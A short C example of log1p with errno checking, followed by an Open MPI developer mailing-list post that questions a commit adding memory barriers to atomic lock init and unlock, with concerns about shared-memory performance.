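#include <errno.h>
#include <math.h>
#include <stdio.h>

int main(void)
{
    double x = 1.0e-10;

    errno = 0;
    /* For small x, log1p(x) is more accurate than log(1.0 + x). */
    double result = log1p(x);
    if (errno != 0)
        perror("log1p");
    else
        printf("log1p(%g) = %.17g\n", x, result);
    return 0;
}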
http://pubs.opengroup.org/onlinepubs/7990989775/xsh/log1p.html
CC-MAIN-2014-42
en
refinedweb
From: George Bosilca (bosilca_at_[hidden]) Date: 2007-02-13 19:10:44. How many memory barrier we have now on the critical path ? Are they all really necessary ? In fact I try to figure out what the problem is ? Why this doesn't happens with any other compiler ? Is this our bug or a PathScale compiler bug ? And the last one: What is the correct way to fix it in a generic way without affecting the performances by 10%. As a matter of fact, we're already slower than MPICH2 for shared memory operations, so something is flawed in our design ... Thanks, george. On Feb 13, 2007, at 4:20 PM, gshipman_at_[hidden] wrote: > Author: gshipman > Date: 2007-02-13 16:20:59 EST (Tue, 13 Feb 2007) > New Revision: 13644 > > Modified: > trunk/opal/include/opal/sys/atomic_impl.h > > Log: > use memory barriers for lock init and unlock > > > Modified: trunk/opal/include/opal/sys/atomic_impl.h > ====================================================================== > ======== > --- trunk/opal/include/opal/sys/atomic_impl.h (original) > +++ trunk/opal/include/opal/sys/atomic_impl.h 2007-02-13 16:20:59 > EST (Tue, 13 Feb 2007) > @@ -337,6 +337,7 @@ > opal_atomic_init( opal_atomic_lock_t* lock, int value ) > { > lock->u.lock = value; > + opal_atomic_mb(); > } > > > @@ -368,6 +369,7 @@ > OPAL_ATOMIC_LOCKED, OPAL_ATOMIC_UNLOCKED); > */ > lock->u.lock=OPAL_ATOMIC_UNLOCKED; > + opal_atomic_mb(); > } > > #endif /* OPAL_HAVE_ATOMIC_SPINLOCKS */ > _______________________________________________ > svn mailing list > svn_at_[hidden] > "Half of what I say is meaningless; but I say it so that the other half may reach you" Kahlil Gibran
http://www.open-mpi.org/community/lists/devel/2007/02/1295.php
CC-MAIN-2014-42
en
refinedweb
XmlReader::ReadContentAsAsync Method Asynchronously reads the content as an object of the type specified. Namespace: System.XmlNamespace: System.Xml Assembly: System.Xml (in System.Xml.dll) Parameters - returnType - Type: System::Type The type of the value to be returned. - namespaceResolver - Type: System.Xml::IXmlNamespaceResolver An IXmlNamespaceResolver object that is used to resolve any namespace prefixes related to type conversion. Return ValueType: System.Threading.Tasks::Task<Object> The concatenated text content or attribute value converted to the requested type. This is the asynchronous version of ReadContentAs,.
http://msdn.microsoft.com/en-us/library/system.xml.xmlreader.readcontentasasync.aspx?cs-save-lang=1&cs-lang=cpp
CC-MAIN-2014-42
en
refinedweb
Published: 6/3/2011 By: Xianzhong Zhu Contents [hide] 1 Introduction 2 Introduction to Regular Expressions 3 Create a Site Search Module 4 Establishing an Universal Search Entrance 5 Create a Search Results Page 5.1 Design the markup code 5.2 Behind code design 5.3 Write the extension method HighlightKeyword 6 Optimize the In-site Searching Module 6.1 Matching accuracy 6.2 User experience 6.3 Keywords filtering issue and URL routing 7 Summary In the last several parts of this series you leaned the backend and front-end modules of the Q&A sample application, as well as part of SEO related techniques under the ASP.NET 4.0 environment. In this part, we will shift out attention to delve into how to construct the internal searching module, what kinds of techniques you should have to accomplish such a module, and what kinds of SEO optimization actions should be taken. You will see we are going to resort to LINQ to Entities to execute the searching operation. And also, C# Regular Expression will play an important role in optimizing such a module and rendering user-friendly searching results. The sample test environments in this series involve: 1. Windows 7; 2. .NET 4.0; 3. Visual Studio 2010; 4. SQL Server 2008 Express Edition & SQL Server Management Studio Express. Regular expressions are used to find and match strings (of course, can also be used for substitution). Regular expressions provide a powerful, flexible, and efficient way to deal with text. Comprehensive pattern matching notation of regular expressions allows you to quickly analyze large amounts of text to find specific character patterns; extract, edit, replace, or delete text substrings; or add the extracted strings to the collection in order to generate a report. For many applications to deal with strings (such as HTML, log file analysis and HTTP header analysis), regular expressions are an indispensable tool. With the help of regular expressions, you can implement the following features: 1. Test the string model within a given string For example, you can test the input string to see if the phone number pattern or credit card number pattern occurs within a specified string. This is often called data validation. 2. Replace the text You can use a regular expression to identify the specific text in the document, completely remove it or replace it with other text. 3. Extract a substring from a string based on a matching pattern You can use regular expressions to find specific text within a document or an input field. In a certain sense Regular expressions constitutes a language. As a language, the regular expression has its own syntax and words (elements). When the language is integrated into C#, it shows more powerful features. C# provides the Regex class (defined in the namespace System.Text.RegularExpressions) to represent an immutable regular expression. The Regex class provides plenty of methods associated with regular expressions match, substitution, and verification. Due to space limit and delving into it will be far from our main topic, you can refer to MSDN and the famous regular expressions tutorial site to find out details. On the bases of the questions and answers modules established previously, let's now create an independent search module for the Q&A sample application. On the whole, the searching module consists of the following crucial areas and technical points: Note that the query method that is described in this article is still based on LINQ to Entities leveraged before. 
Next, we will first set up the fundamentals of the searching module, and then we will explore the related local optimization policies. Generally speaking, the search entry can be placed in a special page, or in a master page of the global Web site or even in a local module. In our case, we will build the search portal on the master page of the Q&A module. Now look at the search entry located inside the master page Site.Master. Figure 1 illustrates the design-time screenshot. Note our interested point currently concentrates upon the searching entrance at the upper right corner. As for another searching entrance at the lower part we'll delve into it in a future article particular at the buffering support and related optimization for the searching functionality. Below indicates the main markup code associated with the basic searching support inside the master page. For simplicity, we've not utilized tips to show more friendly prompt info at the textbox. In fact, there are numerous existing solutions for this; you can search it through Internet or implement your own. Let's next continue to look at the behind coding related to the button Button1. Here we use Server.UrlEncode to encode the content in the TextBox control txtKeyword. In this way, when passing it as the URL parameter we can achieve better compatibility while not have side effect upon the server URL resolve. The searching bar provides basic function, passing the searching parameter to the search result page leaving it to be responsible for related query and output, rather than do this within a PostBack request of the master page. Such a decision will result in the following advantages: Server.UrlEncode txtKeyword (1) Separation of logic Not implementing complex logic in such non-functional pages as the master page or search page will optimize logic, so that special pages do special things. (2) Easier access In the above code, directly jumping to the search results page and providing the "kw" parameter for URL can make the URL be directly and repeatedly visited. In this way, the user can bookmark this URL, so that the next time he can directly access the results list that complies with the same search conditions. Users can also spread the URL, so that other visitors directly access to the results list, without having to re-enter data to search. You will not enjoy this if you use the PostBack logic to make direct output. (3) Facilitate the migration and upgrade Passing the parameter independently is equivalent to building up an interface, so you can always pass parameters to the query module to achieve different query results. This is also a common practice in distributed systems - although the users access the same page from the same server the background processing server may be on another server, when this server can only accept a parameter and returns a corresponding result. Now that we've implemented the searching entrance and set up a way to passing parameters, it is time for us to create another new page to show the searching result. First of all, let's look at the key markup code associated with the page SearchResult.aspx (within the master page Site.Master), as follows. Here, a Repeater control is used to show all the questions related info. The most important part should be the HyperLink control embedded in the ItemTemplate template. As designed, we use URL routing technique to navigate the current user to the page Question.aspx that displays the detailed info associated with the current question. 
And also, we use the extension method HighlightKeyword to highlight the keyword in the question title. HighlightKeyword Next, let's go to look at the behind C# code. Here is the main code of the Page_Load event handler for the file SearchResult.aspx.cs. Page_Load The general logic above is not difficult to understand. First, use Page.RouteData.Values to obtain the passed keyword. Then, construct a complex LINQ to Entities statement to grab the question data that meet the specified conditions. As pointed out in the previous articles, such inquire solution may result in low efficiency. Cute readers can consider using stored procedures inside the database to improve the solution. At last, we bind the data to the Repeater control. That's all. Page.RouteData.Values In a more user-friendly search result page, it is better to highlight the user query keywords. As a simple approach, you can use the following way: However, there are two main disadvantages in this solution: Replace To overcome the above shortcomings, we'd better use the above-covered regular expressions. This is achieved in an extension method called HighlightKeyword in the public static class Common. Extension method is a new feature introduced since C# 3.0. The method HighlightKeywords above is just such one, as an extension method for the string type. For more details about extension method, please refer to MSDN; we'll omit the detailed introduction. HighlightKeywords As for the above method, we'll introduce a little more to let readers gain a better understanding: (1) string{0}</font></strong>". string{0}</font></strong Using this statement we define the highlighted string format. In this case, we make them red. {0} represents a placeholder of the keyword, to help to generate the complete regular expression related string. (2) string expr = @"(?<!{0})(?<kw>{0})"; string expr = @"(?<!{0})(?<kw>{0})"; This statement is used to define the regular expression string. The character @ can help to bypass some "\" related escapes, but not to omit the internal escape symbol inside a regular expression. {0} bears the same meaning as above. Using the above regular expression, two identical characters can not be close together. In addition, kw represents the name of the group (an important element associated with regular expressions). Up till now, a basic internal searching module has been finished. Till now, we've finished setting up a fundamental internal searching module. During the whole process of the implementation, some basic ideas have been shown in building up an in-site search module. However, some of the policies taken for now are now robust. The things mainly focus upon the several aspects below: As for the searching efficiency, we'll dwell upon it in the next caching topic in this series. Now, let's look at the rest points mentioned above. In the previous section, we've achieved the target of highlighting the keywords in the searching result page. It seems pretty beautiful, doesn't it? However, there are big loopholes in such simple regular expressions, one of which is matching accuracy. Next, let's consider a concrete example. For example, if the user is searching the keyword 'long', then he will find in the matched questions, such as "long long ago", multiple keywords close together will all be highlighted. This is not what the user wants. For the application, it is not wrong to highlight all keywords, such as "long", using the regular expressions. However, for the user, it seems that he just enters the keywords "long long". 
This case requires improving the wording of the regular expression to make the matched keywords discontinuous. To solve the above problem, you need to fall back on the atomic zero-width assertion in regular expressions. Table 1 shows the commonly-used atomic zero-width assertion symbols. Assertion Explanations Examples ^ Matches the position at the start of the searched string. If the m (multiline search) character is included with the flags, ^ m (multiline search) character is included with the flags, ^ also matches the position before \n or \r. \d{3}$ matches 3 numeric digits at the end of the searched string. \A Match must appear at the beginning of the string \Z Match must appear at the end of the string or before the newline \n at the end of the string \z Match must appear at the end of the string \G Match must appear in the place where the last match ends \b Matches a word boundary; that is, the position between a word and a space. er\b matches the "er" in "never" but not the "er" in "verb". \B Matches a word non-boundary. er\B matches the "er" in "verb" but not the "er" in "never". Let's now return to the above topic. We should modify the extension method HighlightKeyword in the file common.cs, like the following (note the bold part): Now, with the initial regular expression (?<kw>{0}) prefixed with (?<!{0}), the same contents close together will no more exist. (?<kw>{0}) (?<!{0 First, the character @ indicates that the string following it is a verbatim string. Note that the character @ only applies for constant string (for instance a file path). Second, a string starting with @ can span several lines, so that writing, in the .cs file, JavaScript or SQL script becomes more convenient. Refer to the following: @ Third, in the C# specification, the character @ can be used as the first character of an identifier (class name, variable name, method name, etc.) to allow a reserved keyword in C# as a custom identifier. Refer to the following: Note that although @ appears in the identifier, but it cannot be part of the identifier itself. Therefore, in the above example, we define a class named class, which contains a static method named static and a parameter called bool. In addition, with the symbol @ positioned before a string within a pair of double quotes some of the escape symbols can be omitted, as used in the extension method HighlightKeyword. HighlightKeyword As far as the user experience is concerned in the present searching module, there are still plenty of aspects to improve, such as: Of course, besides the above two points, there are still many areas required to improve. But since these two points are consistent with the general user's habits and representative, we'll only focus upon them and give corresponding solutions. 1. Keywords remaining Since when we implemented the searching function we used the method Response.Redirect() to jump to other page, as well as passing the related parameters, the ViewState cannot hold the entered keyword on the master page. The reason is during the course of the new GET request the textbox for the keyword in the master page will be cleared up. So, at this time, a same keyword requires to be passed to the master page and make the keyword related textbox visible, so that when the current user views the result page he can also see the keyword remain at the textbox. How can we achieve this effect? Response.Redirect() Generally, you use the following code, i.e. 
in the master page of the search results page via the FindControl() method, to locate the keyword input box related server control and set its Text property: FindControl() Text However, this method has a most significant drawback: strongly coupling the user control ID in the master page with the content page, which not only results in the efficiency issue but makes the ID attribute of the keyword entry box server control in the master page can not be easily changed, so that it is very detrimental to maintenance. To solve this problem, you can, in the master page, set the access level of the control txtKeyword to public: txtKeyword And also, in the content page use strong cast for Master to cast the Master type to the type of the current master page and to get from this type the target server control, and at last set the value of the server control's property: On the surface, this approach seems to be a good solution to overcome the drawbacks of using the FindControl() method. But, at the time of solving this problem, another new problem arises. That is, if specified in the page SearchResult.aspx another master page, you need to modify the type at all places where the same master page is referenced, which in turn has strengthened the coupling between the background .cs code and the front end. Another problem with this approach is to make the protected property of the txtKeyword server control changed to public itself is an unsafe practice, which makes txtKeyword accessible outside the Master page. So, how to achieve the targets of not only to meet the above requirements, but also to decouple the relationship between them? To overcome this knot, it is necessary to introduce a new thing, <% @ MasterType%>, and define a property for the master page. <% @ MasterType As the name implies, <% @ MasterType%> is the type of master page, set in an aspx page, and with the position same as <% @ Page%>, generally placed in front of the entire page. MasterType has a VirtualPath attribute, with which you can specify the type of master page. In actual use, however, you only need to specify the master page's address, the same setting as the MasterPageFile property of <% @ Page%>. <% @ MasterType%> <% @ Page MasterType VirtualPath MasterPageFile Here, we use <% @ MasterType%> in the page SearchResult.aspx to define the master page type: Thus, the type of Master in the page SearchResult.aspx is that of the file Site.Master, whose public methods can be easily visited. However, the "public" here is not the public of the control txtKeyword, but for it to create a new public accessor. In the Site.Master file add the following code: public In this way, we can from the page SearchResult.aspx visit the Keyword property of the file Site.Master and set it value. The related code is given below. Keyword Next, let's discuss another user experience related issue – keyword highlight. 2. Keywords highlight When the user from the search results page enters into the details page, if keyword highlighting feature can also be provided for the details page, this will help users to see key words within the shortest time to obtain the desired information. The highlighting feature for the details page is same as highlighting the keyword, decoding the keyword parameter of URL to obtain the initial keyword and then invoke the extension method HighlightKeyword to mark the specified contents. The detailed steps are shown below. 
(1) In the page Question.aspx.cs, add the property KeyWord.

(2) In the Page_Load event method, add the following statement to set the KeyWord.

(3) Before using the preceding Master.Keyword = KeyWord, as with the page SearchResult.aspx, specify the master type for the page Question.aspx.

(4) Modify the method LoadInfo(), called in the Page_Load event method of the page Question.aspx, so that keyword highlighting is applied to the specified area.

(5) Besides the question content and the best answer, if you also want to highlight the contents of the other answers, you can modify the code of the Repeater control in the page Question.aspx.

Keyword filtering in the search engine query is extremely important, because some special keywords may take part in a database query or a regular expression match, which may affect the accuracy of the query or the match, so that application security and stability may be seriously affected. Take our internal search engine for the Q&A module as an example: if you enter special characters, such as "?", "/", or "&", an HTTP 404 error is thrown by the system. In other words, URL routing does not allow such symbols to be passed as parameters in a URL.

Now, let's look at our coding for the above case, in the file Site.Master.cs.

According to MSDN, "UrlEncode() URL encoding ensures that all browsers will correctly transmit text in URL strings. Characters such as a question mark (?), ampersand (&), slash mark (/), and spaces might be truncated or corrupted by some browsers. As a result, these characters must be encoded in tags or in query strings where the strings can be re-sent by a browser in a request string." That is, the first statement is valid and allowed in general code. But as soon as the second statement is executed, the exception shown in Figure 2 is thrown. So, we can say that ASP.NET 4.0 URL routing does not allow the above special characters to be passed as parameters into a URL.

In addition, an ugly HTTP 404 error page like the one in Figure 2 is unfriendly. Readers can create their own exception pages to handle similar things in real scenarios.

Finally, in a real project, SQL injection is another serious issue to consider. Since this is beyond the range of this article, we won't go into further detail.

Well, till now, we've succeeded in building up a basic, still elementary, in-site search engine for the Q&A sample application. As you've seen, we've only implemented basic functionality and provided limited optimization policies for the module. There is still more that deserves research in a real project. In the next and last article, we'll explore a possible buffering policy in constructing an internal search engine for the Q&A sample application.
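The URL-encoding behaviour quoted from MSDN above is not specific to ASP.NET. As a quick illustration for readers who want to experiment outside the .NET stack, here is a minimal Python sketch using only the standard library; the keyword value is made up for the example, and .NET's UrlEncode() follows the same percent-encoding idea rather than producing this exact output.

from urllib.parse import quote, unquote

keyword = "C# & .NET / what?"      # hypothetical search keyword
encoded = quote(keyword, safe="")  # percent-encode every reserved character
print(encoded)                     # -> C%23%20%26%20.NET%20%2F%20what%3F
assert unquote(encoded) == keyword # the receiving page reverses the encoding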
http://dotnetslackers.com/articles/PrintArticle.aspx?ArticleId=634
CC-MAIN-2014-42
en
refinedweb
c/language/struct
From cppreference.com

Compound types are types that can hold multiple data members.

Example

Run this code

#include <stdio.h>

struct car {
    char *make;
    char *model;
    int year;
};

int main() {
    /* external definition */
    struct car c;
    c.make = "Nash";
    c.model = "48 Sports Touring Car";
    c.year = 1923;
    printf("%d %s %s\n", c.year, c.make, c.model);

    /* internal definition */
    struct spaceship {
        char *make;
        char *model;
        char *year;
    } s;
    s.make = "Incom Corporation";
    s.model = "T-65 X-wing starfighter";
    s.year = "128 ABY";
    printf("%s %s %s\n", s.year, s.make, s.model);

    return 0;
}

Output:

1923 Nash 48 Sports Touring Car
128 ABY Incom Corporation T-65 X-wing starfighter
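For readers coming to this reference from Python, the same record layout can be mirrored with the standard-library ctypes module. This is only an illustrative sketch alongside the C example above, not part of the C language reference itself.

from ctypes import Structure, c_char_p, c_int

class Car(Structure):
    # field order and types mirror the C struct above
    _fields_ = [("make", c_char_p),
                ("model", c_char_p),
                ("year", c_int)]

c = Car(b"Nash", b"48 Sports Touring Car", 1923)
print(c.year, c.make.decode(), c.model.decode())
# -> 1923 Nash 48 Sports Touring Car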
http://en.cppreference.com/mwiki/index.php?title=c/language/struct&oldid=46340
CC-MAIN-2014-42
en
refinedweb
Beginning to experiment with Stanza for natural language processing

After installing Stanza as a dependency of UDAR, which I recently described, I decided to play around with what it can do.

Installation

The installation is straightforward and is documented on the Stanza getting started page. First:

sudo pip3 install stanza

Then install a model. For this example, I installed the Russian model:

#!/usr/local/bin/python3
import stanza
stanza.download('ru')

Usage

Part-of-speech (POS) and morphological analysis

Here's a quick example of POS analysis for Russian. I used PrettyTable to clean up the presentation, but it's not strictly-speaking necessary.

#!/usr/local/bin/python3
import stanza
from prettytable import PrettyTable

tab = PrettyTable()
tab.field_names = ["word", "lemma", "upos", "xpos", "features"]
for field_name in tab.field_names:
    tab.align[field_name] = "l"

nlp = stanza.Pipeline(lang='ru', processors='tokenize,pos,lemma')
doc = nlp('Моя собака внезапно прыгнула на стол.')
for sent in doc.sentences:
    for word in sent.words:
        tab.add_row([word.text, word.lemma, word.upos, word.xpos,
                     word.feats if word.feats else "_"])
print(tab)

Note that upos are the universal parts of speech, whereas xpos are language-specific parts of speech.

Named-entity recognition

Stanza can also recognize named entities (persons, organizations, and locations) in the text it analyzes:

import stanza
from prettytable import PrettyTable

tab = PrettyTable()
tab.field_names = ["Entity", "Type"]
for field_name in tab.field_names:
    tab.align[field_name] = "l"

nlp = stanza.Pipeline(lang='ru', processors='tokenize,ner')
doc = nlp("Владимир Путин живёт в Москве и является Президентом России.")
for sent in doc.sentences:
    for ent in sent.ents:
        tab.add_row([ent.text, ent.type])
print(tab)

which prints a table of the recognized entities and their types.

I'm excited to see what can be built from this for language-learning purposes.
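Building on that closing thought, one small language-learning use is a lemma frequency list: the lemmas the pipeline produces can be counted to see which dictionary forms dominate a text. A minimal sketch, assuming the Russian model downloaded earlier; the sample sentences are made up.

from collections import Counter
import stanza

nlp = stanza.Pipeline(lang='ru', processors='tokenize,pos,lemma')
doc = nlp('Собака видит собаку. Собаки любят людей.')

# Count dictionary forms, skipping punctuation tokens
lemmas = Counter(word.lemma
                 for sent in doc.sentences
                 for word in sent.words
                 if word.upos != 'PUNCT')
for lemma, n in lemmas.most_common():
    print(lemma, n)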
https://www.ojisanseiuchi.com/2020/08/20/beginning-to-experiement-with-stanza-for-natural-language-processing/
CC-MAIN-2021-31
en
refinedweb
What Are Selenium Relative Locators And How To Use Them

In this Selenium 4 series, we will dive into Selenium Relative Locators.

What are Relative Locators in Selenium 4?

Relative Locators in Selenium were formerly known as Friendly Locators. In test automation, our main task while writing test scripts for web applications is to locate web elements. We already know the existing Selenium locators (id, name, className, linkText, partialLinkText, tagName, cssSelector, xpath). You can learn about Selenium locators here. The point to note is that sometimes we may not find elements using these locators, and to overcome that we use JavaScriptExecutor. You can learn about JavaScriptExecutor in Selenium here.

In Selenium 4.0, a new kind of locator was added to the list: Friendly Locators, later renamed Relative Locators. They help us locate web elements by their position with respect to other web elements, using above, below, toLeftOf, toRightOf, and near. In simple words, relative locators allow us to locate web elements based on their position relative to other web elements.

There are five relative locators newly added in Selenium 4:

above() - locates a web element just above the specified element
below() - locates a web element just below the specified element
toLeftOf() - locates a web element present to the left of a specified element
toRightOf() - locates a web element present to the right of a specified element
near() - locates a web element approx. 50 pixels away from a specified element. The distance can be passed as an argument to an overloaded method.

Note: The method withTagName() was added, which returns an instance of RelativeLocator. The relative locators above support this method.

Practical Example: Selenium Relative Locators

STEP 1: Import the RelativeLocator method withTagName:
import static org.openqa.selenium.support.locators.RelativeLocator.withTagName;
STEP 2: Launch a web browser and navigate to the test page
STEP 3: Locate the web element 'Your Name' text field
STEP 4: Locate the web element 'Your Email' text field
STEP 5: Locate the 'Your Email' text field, which is to the left of the 'Your Name' text field, and enter the text
STEP 6: Locate the 'Your Name' text field, which is to the right of the 'Your Email' text field, and enter the text
STEP 7: Locate the web element 'Selenium Tutorial' and open it
STEP 8: Locate the web element 'Java Tutorial' and open it
STEP 9: Close the browser to end the program
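The steps above target the Java bindings (hence the import static line). For completeness, Selenium 4's Python bindings expose the equivalent API through locate_with, which offers the same above/below/to_left_of/to_right_of/near methods. The sketch below is illustrative only: the URL and the "email" locator are placeholders, not the exact markup of the practice page.

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.relative_locator import locate_with

driver = webdriver.Chrome()
driver.get("https://example.com/contact-form")  # placeholder URL

email = driver.find_element(By.NAME, "email")   # assumed locator
# Locate the input sitting to the right of the email field (STEP 6's scenario)
name_field = driver.find_element(
    locate_with(By.TAG_NAME, "input").to_right_of(email))
name_field.send_keys("SoftwareTestingMaterial")
driver.quit()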
https://www.softwaretestingmaterial.com/selenium-relative-locators/
CC-MAIN-2021-31
en
refinedweb
In this tutorial, we show how to display RGB (true-color) and false-color image tiles contained in a RasterFrames data structure. RasterFrames brings the characteristics and capabilities of DataFrames to raster imagery data. Tiles are subsets of scenes, and scenes are discrete instances of Earth observation data with a specified spatial extent, date-time, and coordinate reference system.

RGB images are also called true- or natural-color images, as these contain the wavelengths that human vision processes. RGB channels can also be assigned to other spectral bands, such as the near-infrared and short-wave infrared bands. In this instance, the composite RGB images are called false-color images. Below we give examples of how to produce false-color image tiles in addition to true-color image tiles.

Import Libraries

We will start by importing the Python libraries used in this example.

from earthai.init import *
from pyrasterframes.rasterfunctions import *

Query the Earth OnDemand Catalog

Next, we query the Earth OnDemand catalog to obtain imagery with the earth_ondemand.read_catalog function. There are a number of ways to query the catalog. This example queries the MODIS Terra and Aqua surface reflectivity catalog centered on a specific point with longitude-latitude coordinates. This geospatial point corresponds to a location near Palmas, Brazil. We have also arbitrarily selected images collected during the months of September and October of 2019.

catalog = earth_ondemand.read_catalog(
    geo="POINT(-50.8 -10.5)",
    start_datetime='2019-09-01',
    end_datetime='2019-10-31',
    max_cloud=5,
    collections='mcd43a4',
)

Create and Display True-color Tiles

Now we read the results of the Earth OnDemand query into a RasterFrame using the spark.read.raster function. For this example, we'll select the red, green, and blue MODIS bands: B01, B04, and B03, respectively. Simply for clarity, we also rename the B01, B04, and B03 columns as red, green, and blue with the withColumnRenamed method.

true_color_rf = spark.read.raster(catalog, catalog_col_names=['B01', 'B04', 'B03']) \
    .withColumnRenamed('B01', 'red') \
    .withColumnRenamed('B04', 'green') \
    .withColumnRenamed('B03', 'blue')

Now we will create a new tile column that represents the composite image tiles of the red, green, and blue channels, otherwise known as a true-color image. To accomplish this we use the rf_render_png function from the pyrasterframes.rasterfunctions library. This function takes three tile columns, which in this case are the red, green, and blue bands of the MODIS imagery, and combines them into a single composite. It then converts this composite to a PNG-encoded image. The two lines of code below create a new column png that is made up of true-color composite tiles and display the first five true-color tiles in a notebook cell.

true_color_rf = true_color_rf.withColumn('png', rf_render_png('red', 'green', 'blue'))
true_color_rf.select('png')

Create and Display False-color Tiles

You can also assign other spectral bands to the RGB channels, producing false-color images. This can highlight Earth image properties such as differentiating between snow, ice, and clouds, or showing where flooding has occurred. A very common false-color image utilizes the near-infrared, green, and red bands to show vegetation and vegetated areas.
The code below follows the same steps as for generating the true-color image tiles, but now we assign the MODIS near-infrared band to the red channel, the red band to the green channel, and the green band to the blue channel. In these image tiles, the red colors depict areas of vegetation. Dark red represents dense vegetation.

false_color_rf = spark.read.raster(catalog, catalog_col_names=['B02', 'B01', 'B04']) \
    .withColumnRenamed('B02', 'nir') \
    .withColumnRenamed('B04', 'green') \
    .withColumnRenamed('B01', 'red')

false_color_rf = false_color_rf.withColumn('png', rf_render_png('nir', 'red', 'green'))
false_color_rf.select('png')
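If you want to inspect one of these composites outside the notebook, the column produced by rf_render_png holds ordinary PNG bytes, so a tile can be pulled back to the driver and written to disk with plain Spark and Python calls. A small sketch, assuming the false_color_rf DataFrame from above is in scope; the output filename is arbitrary.

# Collect the first rendered tile and save it as a regular PNG file
row = false_color_rf.select('png').first()
with open('false_color_tile.png', 'wb') as f:
    f.write(bytes(row['png']))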
https://docs.astraea.earth/hc/en-us/articles/360051906152-How-to-Create-and-Display-RGB-Image-Tiles-with-RasterFrames
CC-MAIN-2021-31
en
refinedweb
Aligner add-on to support JavaScript.

=: assignment

let foo = "bar"
let test = "notest"
let hello = "world"

+=, -= and others ending with =

let foo = "bar"
let test += "notest"
let hello -= "world"

:: Object

random = {
  troll: "internet",
  foo: "bar",
  bar: "beer"
}

,: Items in arrays

["helloText", 123456, "world"]
["foo"      , 32124 , "bar"]

from:

import * from 'fs';
import * from 'https';

Align trailing comments (with the Align Comments option on)

let hello = 'world'; // line 1
let foo = 'bar';     // line 2

Aligner must be installed along with this package. For more information, please check out Aligner.
https://github-atom-io-herokuapp-com.global.ssl.fastly.net/packages/aligner-javascript
CC-MAIN-2021-31
en
refinedweb
Previews & the Prismic Toolbar

Using an official Prismic starter project? If you are using one of our official Prismic starter projects, then you should already have all the code in place that you need for Previews and the Prismic Toolbar! If you're not using an official Prismic project, then follow the rest of the steps below.

The Link Resolver function

This requires the use of a Link Resolver function so that the preview endpoint knows where to redirect to. You can learn more about link resolving by checking out our Link Resolver page.

// Example preview endpoint for NodeJS with ExpressJS
app.get('/preview', function (req, res) {
  // preview code shown below
});

When requested, this endpoint must:

- Retrieve the preview token from the token parameter in the query string
- Retrieve the documentId from the query string
- Pass the token and documentId into the getPreviewResolver method as shown below (@prismicio/client kit V4.0.0 and above)

const Prismic = require('@prismicio/client');
const linkResolver = require('./path/to/the/link-resolver.js');

exports.prismicPreview = async (req, res) => {
  const { token, documentId } = req.query;
  const api = await Prismic.client('');
  const redirectUrl = await api.getPreviewResolver(token, documentId).resolve(linkResolver, '/');
  cookies.set(...) // set cookie
  res.redirect(302, redirectUrl);
}

For anyone using a version of the @prismicio/client kit older than V3.0.1, you should pass this token into the previewSession method as shown below.

const Prismic = require('@prismicio/client');
const linkResolver = require('./path/to/the/link-resolver.js');
const apiEndpoint = '';

// Example preview endpoint for NodeJS with ExpressJS
app.get('/preview', function (req, res) {
  const token = req.query.token;
  Prismic.client(apiEndpoint, { req: req })
    .then((api) => api.previewSession(token, linkResolver, '/'))
    .then((url) => {
      res.redirect(302, url);
    });
});

Are you using the @prismicio/client library? This last step is only required if you are not using the @prismicio/client library to retrieve your API object; Prismic.client handles the preview ref for you. Otherwise, select the ref as follows:

- nodejs

var Cookies = require('cookies');

// Example ref selection for NodeJS with ExpressJS
const cookies = new Cookies(req, res);
const previewRef = cookies.get(Prismic.previewCookie);
const masterRef = api.refs.find(ref => {
  return ref.isMasterRef === true;
});
const ref = previewRef || masterRef.ref;

- react

import Cookies from 'js-cookie';

const previewRef = Cookies.get(Prismic.previewCookie);
const masterRef = client.refs.find(ref => {
  return ref.isMasterRef === true
}).ref;
const ref = previewRef || masterRef;

Then here is an example that shows how to use this ref in your query:

api.query(
  Prismic.Predicates.at('document.type', 'blog_post'),
  { ref }
).then(function(response) {
  // response is the response object, response.results holds the documents
});
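Although this page documents the JavaScript kits, the endpoint contract itself (read token and documentId from the query string, resolve a redirect URL, set the preview cookie, return a 302) is language-agnostic. The Flask sketch below is a rough illustration only: resolve_preview_url is a hypothetical helper you would implement with your own Prismic client and Link Resolver, and the cookie name is an assumption about what the toolbar expects.

from flask import Flask, request, redirect, make_response

app = Flask(__name__)

def resolve_preview_url(token, document_id):
    # Hypothetical helper: query the Prismic API with the preview token,
    # then run the result through your Link Resolver. Implementation omitted.
    return "/"

@app.route("/preview")
def preview():
    token = request.args.get("token", "")
    document_id = request.args.get("documentId", "")
    resp = make_response(redirect(resolve_preview_url(token, document_id), code=302))
    resp.set_cookie("io.prismic.preview", token)  # assumed cookie name
    return resp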
https://prismic.io/docs/technologies/previews-and-the-prismic-toolbar-javascript
CC-MAIN-2021-31
en
refinedweb
hou.rampParmType

Enumeration of ramp types.

Values:

hou.rampParmType.Color
hou.rampParmType.Float
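One common place these values appear is when building a ramp parameter programmatically: the third argument of hou.RampParmTemplate takes a member of this enumeration. A minimal sketch, assuming it runs inside a Houdini session where the hou module is available; the parameter name and label are arbitrary.

import hou

# hou.rampParmType.Float builds a spline ramp; use .Color for a color ramp
ramp_template = hou.RampParmTemplate("myramp", "My Ramp", hou.rampParmType.Float)
print(ramp_template.type())  # reports a ramp parameter template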
https://www.sidefx.com/docs/houdini/hom/hou/rampParmType.html
CC-MAIN-2021-31
en
refinedweb
Good afternoon all! I am trying to automate date calculations using the field calculator in ArcGIS Pro. I have defined survey dates, which I would like to use to create reinspection dates. The reinspection date is 1 year for high-risk zones, 3 years for medium-risk zones, and 5 years for low-risk zones. Is there a piece of code I could use in the field calculator to automate this calculation? The best sample I came up with for high-risk zones is:

Expression: arcpy.time.ParseDateTimeString(!SurveyDate!) + datetime.timedelta(days=365)

However, this did not work when I tried to execute the script. Any help is appreciated. Thank you

Solved! Go to Solution.

Thank you for your help, that has worked. I just need to create an 'if' statement now. Is one able to loop the statement in the field calculator whenever a new entry is created?

Not sure what you mean by looping the statement in the field calculator. Calculate Field will perform the operation on all (or selected) records once. If you want it to do multiple things when you run Calculate Field, you'll have to code that logic, possibly using an if statement. If you want to automatically do something when a condition is met (new record, new value, etc.), that would be something different. Maybe look into Attribute Assistant or Attribute Rules. If it's in an RDBMS, you could make a database trigger. Or, if it doesn't need to be immediate, you could schedule a Python script as a Windows task.

You say it did not work, but what was the result? No values? Incorrect values? Error message? In the case of an error, what was the complete message (check the geoprocessing results)? If you're working with the datetime library, you'll need to import datetime. Try something like this for the Python code block:

def calc_reinspection(survey_date):
    date_str_format = "%d/%m/%Y"
    survey_date = datetime.datetime.strptime(survey_date, date_str_format)
